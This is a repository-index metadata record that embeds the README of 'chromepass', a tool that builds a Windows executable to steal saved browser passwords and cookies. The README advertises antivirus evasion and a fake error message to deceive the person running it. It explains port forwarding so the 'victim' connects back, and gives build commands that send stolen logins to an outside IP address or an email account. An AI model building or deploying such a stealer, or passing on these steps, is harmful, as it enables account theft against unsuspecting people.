{"id":13546034,"url":"https://github.com/darkarp/chromepass","last_synced_at":"2025-05-07T09:45:19.095Z","repository":{"id":37043227,"uuid":"110183935","full_name":"darkarp/chromepass","owner":"darkarp","description":"Chromepass - Hacking Chrome Saved Passwords","archived":false,"fork":false,"pushed_at":"2023-12-27T03:27:43.000Z","size":22259,"stargazers_count":798,"open_issues_count":10,"forks_count":112,"subscribers_count":25,"default_branch":"master","last_synced_at":"2025-03-31T08:44:14.819Z","etag":null,"topics":["av-detection","chromepass","computer-engineering","cookies","google-chrome","hack","hacking","hacking-chrome","hacking-tool","hacks","hacktoberfest","hacktoberfest-accepted","hacktoberfest2021","password","password-cracker","passwords","phishing","python","security"],"latest_commit_sha":null,"homepage":"","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"agpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/darkarp.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2017-11-10T00:54:27.000Z","updated_at":"2025-03-28T22:34:15.000Z","dependencies_parsed_at":"2024-01-16T17:36:13.830Z","dependency_job_id":"14bd0c91-3b25-42c9-8c48-981c8f89b29b","html_url":"https://github.com/darkarp/chromepass","commit_stats":null,"previous_names":[],"tags_count":23,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/darkarp%2Fchromepass","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/darkarp%2Fchromepass/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/darkarp%2Fchromepass/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/darkarp%2Fchromepass/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/darkarp","download_url":"https://codeload.github.com/darkarp/chromepass/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":252853879,"owners_count":21814602,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["av-detection","chromepass","computer-engineering","cookies","google-chrome","hack","hacking","hacking-chrome","hacking-tool","hacks","hacktoberfest","hacktoberfest-accepted","hacktoberfest2021","password","password-cracker","passwords","phishing","python","security"],"created_at":"2024-08-01T12:00:30.377Z","updated_at":"2025-05-07T09:45:19.075Z","avatar_url":"https://github.com/darkarp.png","language":"Rust","funding_links":[],"categories":["Web and Cloud Security","Rust"],"sub_categories":["Pentesting"],"readme":"\u003ch1 align='center'\u003eChromepass - Hacking Chrome Saved Passwords and Cookies\u003c/h1\u003e\n\u003cp align=\"center\"\u003e\t\n    \u003cimg src=\"https://img.shields.io/badge/Platform-Windows-green\" /\u003e\n\t\u003ca href=\"https://github.com/darkarp/chromepass/releases/latest\"\u003e\n\t\u003cimg src=\"https://img.shields.io/github/v/release/darkarp/chromepass\" alt=\"Release\" /\u003e\n\t\u003c/a\u003e\n  \u003ca href=\"https://travis-ci.org/darkarp/chrome-password-hacking\"\u003e\n    \u003cimg src=\"https://img.shields.io/badge/build-passing-green\" alt=\"Build Status on CircleCI\" /\u003e\n\t\u003c/a\u003e\n    \u003cimg src=\"https://img.shields.io/maintenance/yes/2021\" /\u003e\n\t\u003c/br\u003e\n  \n  \u003ca href=\"https://github.com/darkarp/chromepass/commits/master\"\u003e\n    \u003cimg src=\"https://img.shields.io/github/last-commit/darkarp/chromepass\" /\u003e\n  \u003c/a\u003e\n  \u003cimg alt=\"Scrutinizer code quality (GitHub/Bitbucket)\" src=\"https://img.shields.io/scrutinizer/quality/g/darkarp/chromepass?style=flat\"\u003e\n  \u003ca href=\"https://github.com/darkarp/chromepass/blob/master/LICENSE\"\u003e\n    \u003cimg src=\"http://img.shields.io/github/license/darkarp/chromepass\" /\u003e\n  \u003c/a\u003e\n  \u003c/br\u003e\n  \u003ca href=\"https://github.com/darkarp/chromepass/issues?q=is%3Aopen+is%3Aissue\"\u003e\n\t\u003cimg alt=\"GitHub issues\" src=\"https://img.shields.io/github/issues/darkarp/chromepass\"\u003e\n\u003c/a\n\u003ca href=\"https://github.com/darkarp/chromepass/issues?q=is%3Aissue+is%3Aclosed\"\u003e\n\t\u003cimg alt=\"GitHub closed issues\" src=\"https://img.shields.io/github/issues-closed/darkarp/chromepass\"\u003e\n\u003c/a\u003e\n\u003c/br\u003e\n  \u003ca href=\"https://discord.gg/beczNYP\"\u003e\n    \u003cimg src=\"https://img.shields.io/badge/discord-join-7289DA.svg?logo=discord\u0026longCache=true\u0026style=flat\" /\u003e\n  \u003c/a\u003e\n  \u003c/br\u003e\n    \u003ca href=\"https://github.com/darkarp/chromepass/blob/master/templates/resources/demo.gif\" target=\"_blank\"\u003eView Demo\u003c/a\u003e\n    ·\n    \u003ca href=\"https://github.com/darkarp/chromepass/issues/new?assignees=\u0026labels=\u0026template=bug_report.md\u0026title=\"\u003eReport Bug\u003c/a\u003e\n    ·\n    \u003ca href=\"https://github.com/darkarp/chromepass/issues/new?assignees=\u0026labels=\u0026template=feature_request.md\u0026title=\"\u003eRequest Feature\u003c/a\u003e\n  \u003c/p\u003e  \n  \n  \n\u003c!-- TABLE OF CONTENTS --\u003e\n## Table of Contents\n\n* [About the Project](#about-the-project)  \n\t* [AV Detection](#av-detection)\n* [Getting started](#getting-started)\n  * [Prerequisites](#dependencies-and-requirements)\n  * [Installation](#installation)\n* [Usage](#usage)\n* [Email](#email)\n* [Errors, Bugs and Feature Requests](#errors-bugs-and-feature-requests)\n* [Learn More](#learn-more)\n* [License](#license)\n* [Demo](#demo)\n---\n## About The project\nChromepass is a python-based console application that generates a windows executable with the following features:\n\n  - Decrypt Google Chrome, Chromium, Edge, Brave, Opera and Vivaldi saved paswords and cookies\n  - Send a file with the login/password combinations and cookies remotely (http server or email)\n  - Undetectable by AV if done correctly\n  - Custom icon\n  - Custom error message\n  - Customize port\n\n---\n\n### AV Detection!  \n\nThe new client build methodology practically ensures a 0% detection rate, even without AV-evasion tactics. If this becomes false in the future, some methods will be implemented to improve AV evasion.  \n\nAn example of latest scans (note: within 10-12 hours we go from 0-2 detections to 32 detections so run the analysis on your own builds): \n  * [VirusTotal Scan 1](https://www.virustotal.com/gui/file/71d5600e2e9dbdc446aeca554d1f033a69d6f5cf5a7565d317cc22329c084f51/detection)\n  * [VirusTotal Scan 2](https://www.virustotal.com/gui/file/f674032061e3d5639d168d68d60a8ff0a53bc249705ec9eb032a385015c20a42/detection)\n  * [VirusTotal Scan 3](https://www.virustotal.com/gui/file/462de7fc96d2db7af3400b23d32a75d28909c19e756678f0d2f261efde705165/detection)\n  * [VirusTotal Scan 4](https://www.virustotal.com/gui/file/d71a48fb7dc02a14823ceeedd5808e13b6734873f7b1b5c09db433b59eab256e/detection)\n\n ---\n## Getting started\n\n### Dependencies and Requirements\n\nThis is a very simple application, which uses only:\n\n* [Python] - Tested on python 3.9+\n\n\u003eIt recommended to perform the installation inside a Windows VM. Some parts of the installation procedure might be affected by existing configurations. This was tested on a clean Windows 10 VM.\n\n### Installation\n\n\u003eChromepass requires Windows to compile! Support for linux and macOS may be added soon.\n\n#### **Clone the repository**:\n```powershell\ngit clone https://github.com/darkarp/chromepass\n```\n\u003eNote: Alternatively to cloning the repository, you can download the latest release, since the repository may be more bug-prone.\n\n### **Install the dependencies**:\n\nThe dependencies are checked and installed automatically, so you can just skip to [Usage](#usage). It's recommended that you use a clean VM, just to make sure there are no conflicts.\n\nIf you don't have the dependencies and your internet isn't fast, this will take a while. Go grab some coffee.   \n\n---\n\n## Usage\n\nChromepass is very straightforward. Start by running:\n```powershell\npython create.py -h\n```\nA list of options will appear and are self explanatory.\n\nRunning without any parameters will build the server and the client connecting to `127.0.0.1`. \n\nA simple example of a build:\n```powershell\npython create.py --ip 92.34.11.220 --error --message 'An Error has happened'\n```\n\nAfter creating the server and the client, make sure you're running the server when the client is ran.\n\nThe cookies and passwords will be saved in `json` files on a new folder called `data` in the same directory as the server, separated by ip address.  \n\n-- --\n\n## Email\nChromepass supports sending the files via email, although it's still experimental.\nTo enable this, you can use the `--email` flag while creating the server. You'll need two things, a username (your email) and a password (an app password).\n\nTo generate an app password you must go into your `account settings` -\u003e `Security` and enable 2-step authentication (required!)\n\nAfter 2-step authentication is enabled, you'll see a new option called `App Passwords`:\n![2-step-authentication](https://i.imgur.com/Ip3ShCI.png)\n\nYou want to click there and then choose the appropriate options and then generate a password:\n![2-step-authentication](https://i.imgur.com/DoQQ4Qn.png) \n\nAfter clicking `Generate` it will give you the needed password.\nYou can use the username and password directly in the command or you can simply put it inside the `config.ini`, where it says `YOUR_USERNAME` and `YOUR_PASSWORD`.\n\n### Example with credentials in command\n```powershell\npython create.py --error --message 'An Error has happened' --email --username myuser@gmail.com --password qwertyuiopasdfghh\n```\n### If you put the credentials in the config file (you'll see where if you open this file)\n```powershell\npython create.py --error --message 'An Error has happened' --email\n```\n\n### Remote Notes\n\u003eIf you'd like to use this in a remote scenario, you must also perform port forwarding (port 80 by default), so that when the victim runs the client it is able to connect to the server on the correct port.  \nFor more general information, click [here](https://www.noip.com/support/knowledgebase/general-port-forwarding-guide/). If you're still not satisfied, perform a google search.\n\n---\n\n## Manual dependency installation\n\nThe automated setup is experimental. For one reason or another, the setup might fail to correctly install the dependencies. If that's the case, you must install them manually.  \nFortunately, there are only 2 dependencies:  \n  - [Microsoft Visual C++ Build Tools](https://visualstudio.microsoft.com/thank-you-downloading-visual-studio/?sku=BuildTools\u0026rel=16) (install with the recommended workflows)\n  - [Rustup](https://rustup.rs/)\n\nInstead of the build tools you can also just install visual studio but it will take more space.\n\nAfter successfully installing the build tools, you can simply run the `rustup-init.exe` from [Rustup](https://rustup.rs/)'s website.\n\nThis completes the required dependencies and you should be good to go.\n\n---\n\n## Errors, Bugs and feature requests\n\nIf you find an error or a bug, please report it as an issue.\nIf you wish to suggest a feature or an improvement please report it in the issue pages.\n\nPlease follow the templates shown when creating the issue.  \n\n---\n\n\n## Learn More\n\nFor access to a community full of aspiring computer security experts, ranging from the complete beginner to the seasoned veteran,\njoin our Discord Server: [WhiteHat Hacking](https://discord.gg/beczNYP)\n\nIf you wish to contact me, you can do so via: `mario@whitehathacking.tech` \n\n---\n\n## Disclaimer\nI am not responsible for what you do with the information and code provided. This is intended for professional or educational purposes only.\n\n## License\n\u003ca href=\"https://github.com/darkarp/chromepass/blob/master/LICENSE\"\u003e AGPL-3.0 \u003c/a\u003e\n\n---\n[![Code Intelligence Status](https://scrutinizer-ci.com/g/darkarp/chromepass/badges/code-intelligence.svg?b=master)](https://scrutinizer-ci.com/code-intelligence)  \n\n[Python]: \u003chttps://www.python.org/downloads/\u003e\n\n## Demo\n![til](./templates/resources/demo.gif)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdarkarp%2Fchromepass","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fdarkarp%2Fchromepass","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdarkarp%2Fchromepass/lists"}